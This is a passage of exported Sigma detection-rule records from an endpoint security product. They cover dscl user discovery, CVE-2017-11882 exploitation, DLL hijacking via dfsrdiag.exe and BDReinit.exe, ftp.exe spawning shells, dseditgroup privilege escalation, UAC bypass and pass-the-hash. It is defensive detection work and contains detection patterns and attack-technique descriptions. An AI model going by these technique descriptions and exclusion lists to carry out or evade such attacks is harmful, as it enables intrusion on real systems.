exclusion_jamf:\n ParentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/library/privilegedhelpertools/com.jamfsoftware.composer.helper'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "394e4403-48b4-4304-8127-3fc432fe70aa",
"rule_name": "Users Properties Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all users and their properties.\nAttackers may use it during the discovery phase of an attack to retrieve a list of users and their properties, such as their Apple ID, which groups they belong to, and their User IDs.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "395679f3-08b5-4f6e-92ac-f29f2338ef57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604584Z",
"creation_date": "2026-03-23T11:45:34.604587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882",
"https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "cve_2017_11882_office_eqnedt32.yml",
"content": "title: Office CVE-2017-11882 Vulnerability Exploited\nid: 395679f3-08b5-4f6e-92ac-f29f2338ef57\ndescription: |\n Detects the possible exploitation of CVE-2017-11882 related to the Microsoft Office EQNEDT32.EXE binary.\n This vulnerability allows an attacker to perform abitrary code execution from a Microsoft Office application.\n It is recommended to analyze processes spawned by the Equation Editor process to determine their legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n - https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla\n - https://attack.mitre.org/techniques/T1203/\ndate: 2021/01/07\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566.001\n - cve.2017-11882\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.EQNEDT32\n - classification.Windows.Exploit.Office\n - classification.Windows.Exploit.CVE-2017-11882\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\EQNEDT32.EXE'\n\n exclusion_werfault:\n # C:\\WINDOWS\\system32\\WerFault.exe -u -p 556 -s 1160\n Image:\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n CommandLine|contains: ' -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "395679f3-08b5-4f6e-92ac-f29f2338ef57",
"rule_name": "Office CVE-2017-11882 Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2017-11882 related to the Microsoft Office EQNEDT32.EXE binary.\nThis vulnerability allows an attacker to perform abitrary code execution from a Microsoft Office application.\nIt is recommended to analyze processes spawned by the Equation Editor process to determine their legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-01-07",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "398fc353-ba44-4dfc-84a9-33585c83daef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097973Z",
"creation_date": "2026-03-23T11:45:34.097975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsrdiag.yml",
"content": "title: DLL Hijacking via dfsrdiag.exe\nid: 398fc353-ba44-4dfc-84a9-33585c83daef\ndescription: |\n Detects potential Windows DLL Hijacking via dfsrdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfsrdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\clusapi.dll'\n - '\\dsparse.dll'\n - '\\esent.dll'\n - '\\fltlib.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "398fc353-ba44-4dfc-84a9-33585c83daef",
"rule_name": "DLL Hijacking via dfsrdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfsrdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39a96861-139b-49ca-a6f1-21daa047960d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085960Z",
"creation_date": "2026-03-23T11:45:34.085963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085967Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ftp.yml",
"https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/software/S0095/"
],
"name": "t1218_ftp_spawning_cmd.yml",
"content": "title: Shell Process Spawned by ftp.exe\nid: 39a96861-139b-49ca-a6f1-21daa047960d\ndescription: |\n Detects a suspicious attempt to execute commands through a legitimate ftp.exe signed binary.\n Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.\n It is recommended to analyze the parent process as well as all child processes of ftp.exe to look for malicious content or actions.\nreferences:\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ftp.yml\n - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/software/S0095/\ndate: 2021/08/05\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.s0095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.FTP\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_child:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '\\cmd.exe /C '\n selection_parent:\n ParentImage|endswith:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\SysWOW64\\ftp.exe'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39a96861-139b-49ca-a6f1-21daa047960d",
"rule_name": "Shell Process Spawned by ftp.exe",
"rule_description": "Detects a suspicious attempt to execute commands through a legitimate ftp.exe signed binary.\nAdversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.\nIt is recommended to analyze the parent process as well as all child processes of ftp.exe to look for malicious content or actions.\n",
"rule_creation_date": "2021-08-05",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618361Z",
"creation_date": "2026-03-23T11:45:34.618363Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618367Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1078_003_dseditgroup_admin.yml",
"content": "title: User Added to Admin Group via dseditgroup\nid: 39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd\ndescription: |\n Detects the execution of dseditgroup with a suspicious ancestor process.\n Adversaries may leverage the dseditgroup to escalate privileges by adding a valid user in the admin group.\n It is recommended to check if the user is expected to be admin and for suspicious activities by the parents processes.\nreferences:\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2024/07/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.defense_evasion\n - attack.initial_access\n - attack.t1078.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'dseditgroup'\n CommandLine|contains|all:\n - ' admin'\n - ' -a'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - 'osascript'\n - 'python'\n - 'perl'\n - 'ruby'\n - 'bash'\n - '/sh'\n - 'zsh'\n - 'com.apple.automator.runner'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_ansible:\n ProcessGrandparentCommandLine|startswith: '/bin/sh -c echo BECOME-SUCCESS-'\n\n exclusion_kandji:\n ProcessAncestors: '/usr/bin/sudo|/bin/bash|/Library/Kandji/Kandji Agent.app/Contents/Helpers/Kandji Library Manager.app/Contents/MacOS/kandji-library-manager|/sbin/launchd'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_var:\n ProcessGrandparentCommandLine|contains: '/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000'\n Ancestors: '/usr/bin/sudo|/bin/bash'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd",
"rule_name": "User Added to Admin Group via dseditgroup",
"rule_description": "Detects the execution of dseditgroup with a suspicious ancestor process.\nAdversaries may leverage the dseditgroup to escalate privileges by adding a valid user in the admin group.\nIt is recommended to check if the user is expected to be admin and for suspicious activities by the parents processes.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39c7e57b-5207-433d-b9bf-7b43f9617495",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593565Z",
"creation_date": "2026-03-23T11:45:34.593569Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593576Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdreinit.yml",
"content": "title: DLL Hijacking via BDReinit.exe\nid: 39c7e57b-5207-433d-b9bf-7b43f9617495\ndescription: |\n Detects potential Windows DLL Hijacking via BDReinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BDReinit.exe'\n ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files (x86)\\Ivanti\\Endpoint\\'\n - '?:\\Program Files\\Ivanti\\Endpoint\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files (x86)\\Ivanti\\Endpoint\\'\n - '?:\\Program Files\\Ivanti\\Endpoint\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39c7e57b-5207-433d-b9bf-7b43f9617495",
"rule_name": "DLL Hijacking via BDReinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BDReinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39c97768-09b3-4aa2-adfb-07c4804f4ccf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084438Z",
"creation_date": "2026-03-23T11:45:34.084441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084445Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
],
"name": "t1548_002_post_uac_bypass_compmgmtlauncher.yml",
"content": "title: UAC Bypass Executed via CompMgmtLauncher\nid: 39c97768-09b3-4aa2-adfb-07c4804f4ccf\ndescription: |\n Detects an unusual process being spawned by CompMgmtLauncher.exe.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to check the spawned process for suspicious activities.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\ndate: 2021/01/04\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\CompMgmtLauncher.exe'\n\n filter_image:\n Image:\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\Syswow64\\mmc.exe'\n - '?:\\Windows\\system32\\ServerManager.exe'\n - '?:\\Program Files\\Google\\Drive File Stream\\\\*\\crashpad_handler.exe'\n - '?:\\Program Files (x86)\\WinRAR\\RarExtLoader.exe'\n # C:\\Program Files (x86)\\Adobe\\Acrobat 2015\\Acrobat\\acrotray.exe\n - '?:\\Program Files (x86)\\Adobe\\Acrobat 20??\\Acrobat\\acrotray.exe'\n - '?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrotray.exe'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat DC\\Acrobat\\acrotray.exe'\n - '?:\\program files\\path copy copy\\pathcopycopysettings.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39c97768-09b3-4aa2-adfb-07c4804f4ccf",
"rule_name": "UAC Bypass Executed via CompMgmtLauncher",
"rule_description": "Detects an unusual process being spawned by CompMgmtLauncher.exe.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to check the spawned process for suspicious activities.\n",
"rule_creation_date": "2021-01-04",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073151Z",
"creation_date": "2026-03-23T11:45:34.073153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073158Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://stealthbits.com/blog/how-to-detect-pass-the-hash-attacks/",
"https://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1550_003_pass_the_hash.yml",
"content": "title: Pass-the-Hash Attack Detected\nid: 39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0\ndescription: |\n Detects s successful logon using the Pass-the-Hash technique.\n A Pass-the-Hash attack requires having an administrator account and is used to move laterally inside an Active Directory network.\n This attack allows the usage of a password hash for authentication without the need to brute-force it to obtain the cleartext password.\n The credential dumper Mimikatz is often used by attackers to perform this attack, but all red team frameworks implement this technique.\n When a user executes the command \"runas.exe\" with the \"/netonly\" flag, this alert will be triggered, and can be considered a false positive.\n It is recommended to investigate the context of this action to determine its legitimacy.\n Checking the fields 'SubjectUserName' and 'TargetOutboundUserName' give useful information about the credentials involved.\nreferences:\n - https://stealthbits.com/blog/how-to-detect-pass-the-hash-attacks/\n - https://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2021/09/30\nmodified: 2025/04/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.PassTheHash\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4624\n LogonType: '9'\n LogonProcessName: 'seclogo'\n AuthenticationPackageName: 'Negotiate'\n\n exclusion_itrust:\n SubjectUserName|endswith: '$'\n TargetUserSid: 'S-1-5-18'\n TargetOutboundUserName:\n - 'Domain_Admin_???????'\n - 'Support_???????'\n exclusion_itrust_no_mapping:\n SubjectUserName|endswith: '$'\n event_data.TargetUserSid: 'S-1-5-18'\n event_data.TargetOutboundUserName:\n - 'Domain_Admin_???????'\n - 'Support_???????'\n\n # Netwrix Auditor\n exclusion_netwrix:\n SubjectUserName:\n - 'SYSTEM'\n - 'Système'\n TargetUserSid: 'S-1-5-18'\n TargetOutboundUserName:\n - 'netwrixsvc'\n - 'NETWRIXAD_GMSA$'\n - 'svc_netwrix'\n - 'svc_netwrix@*'\n exclusion_netwrix_no_mapping:\n SubjectUserName:\n - 'SYSTEM'\n - 'Système'\n event_data.TargetUserSid: 'S-1-5-18'\n event_data.TargetOutboundUserName:\n - 'netwrixsvc'\n - 'NETWRIXAD_GMSA$'\n - 'svc_netwrix'\n - 'svc_netwrix@*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39cc3158-01b2-4bd7-8ac4-dcc5e3853eb0",
"rule_name": "Pass-the-Hash Attack Detected",
"rule_description": "Detects s successful logon using the Pass-the-Hash technique.\nA Pass-the-Hash attack requires having an administrator account and is used to move laterally inside an Active Directory network.\nThis attack allows the usage of a password hash for authentication without the need to brute-force it to obtain the cleartext password.\nThe credential dumper Mimikatz is often used by attackers to perform this attack, but all red team frameworks implement this technique.\nWhen a user executes the command \"runas.exe\" with the \"/netonly\" flag, this alert will be triggered, and can be considered a false positive.\nIt is recommended to investigate the context of this action to determine its legitimacy.\nChecking the fields 'SubjectUserName' and 'TargetOutboundUserName' give useful information about the credentials involved.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-04-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39d92e23-6a48-41c3-ab96-57747580f3e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
